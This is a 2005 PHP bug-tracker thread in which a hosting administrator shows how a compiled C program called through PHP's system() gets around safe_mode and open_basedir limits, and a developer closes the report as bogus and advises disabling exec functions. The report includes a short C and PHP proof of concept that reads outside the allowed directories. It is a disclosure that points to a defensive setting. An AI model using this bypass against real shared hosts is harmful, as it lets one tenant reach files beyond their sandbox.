ID: 32421
Updated by: [EMAIL PROTECTED]
Reported By: ricardi at gmail dot com
Status: Bogus
Bug Type: Program Execution
Operating System: *nix (Tested on Linux)
PHP Version: 4.3.10
New Comment:
>The PHP engine can't not control de children created by the
>exec functions?
exactly.
and nobody can.
Previous Comments:
------------------------------------------------------------------------
[2005-03-23 16:38:58] ricardi at gmail dot com
The PHP engine can't not control de children created by the exec
functions? This could be a great security enhancement, since that some
php applications are suffering from xploits that use this technic. I've
already disable this functions now, but our clients are unhappy with
this limitations.
------------------------------------------------------------------------
[2005-03-23 08:23:53] [EMAIL PROTECTED]
Disable system() and other exec functions then.
PHP is unable to prevent you to shoot your leg or to format harddrive
with a binary called by a binary.
------------------------------------------------------------------------
[2005-03-23 01:10:23] ricardi at gmail dot com
Description:
------------
We bypass the safe_mode restrictions using binary with "system"
function built-in. The problem occurs when we had an incident in a mass
virtualhost machine. One of the domains, execute a script that bypass
the safe_mode restrictions like open_base_dir and safe_mode_exec_dir.
The configurations in the virtualhost was like:
<VirtualHost *>
ServerName www.something.com
ServerPath /mnt/nfs/domains/something.com.br/www
php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_include_dir
/mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
...
</VirtualHost>
We create a simple program in "C" that create a file outside the
open_basedir and execute a binary that isn't in the
safe_mode_exec_dir:
/* ---------------
Contents of file.c
---------------- */
#include <stdio.h>
int main() {
system("find / -maxdepth 1 > /tmp/trash.txt");
return 0;
}
Compiling: gcc -o file file.c
With an ftp access, we put the file in the safe_mode_exec_dir:
> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x 1 nfsnobod nfsnobod 13576 Mar 22 16:57 file
Now create a php script that calls the binary.
<?php
system("file");
?>
Then put this on the webroot and after accessing the script with
http://www.something.com.br/script.php, check the /tmp:
> ls -la /tmp
-rw-r--r-- 1 nfsnobody nfsnobody 139 Mar 22 21:00
trash.txt
We had to disable the execution feature from our product.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=32421&edit=1
